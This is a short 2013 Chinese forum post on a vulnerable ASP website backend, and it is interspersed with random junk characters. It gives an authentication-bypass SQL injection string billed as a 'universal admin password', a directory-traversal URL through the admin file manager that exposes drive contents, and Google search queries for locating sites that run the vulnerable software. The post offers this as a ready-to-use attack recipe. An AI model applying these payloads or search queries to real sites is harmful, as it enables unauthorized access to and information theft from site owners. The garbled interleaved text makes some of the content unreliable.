后台万能密码 'or'='or'0 S9 d9 z7 Q( Q5 j* v- K# P" X
7 }* u+ R4 y! ~ O1 [% _' C# H4 _3 f
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
8 j1 }9 T8 ?! G" j) M4 n) cadmin/uploadfile.asp?currentFolder=/upfiles/../. B$ I% o* h: r/ T9 }: e) b7 T" y
, P/ X F+ z1 m3 ~) L$ J4 S9 ?; q漏洞证明:
3 l$ J$ d5 l0 _: J$ Q' I v. J: [; z" x8 s# c5 e( ]
谷歌:inurl:type.asp?id=1 新闻中心
! `! A6 J `* t2 T1 ^5 e% y或者 :inurl:download_ok.asp?5 W H' }1 @& M) V$ F6 L8 v/ h( e# R6 J
' P- A& k9 r# O5 f7 ^
|
发表于 2013-3-14 20:17:32
收藏
支持
反对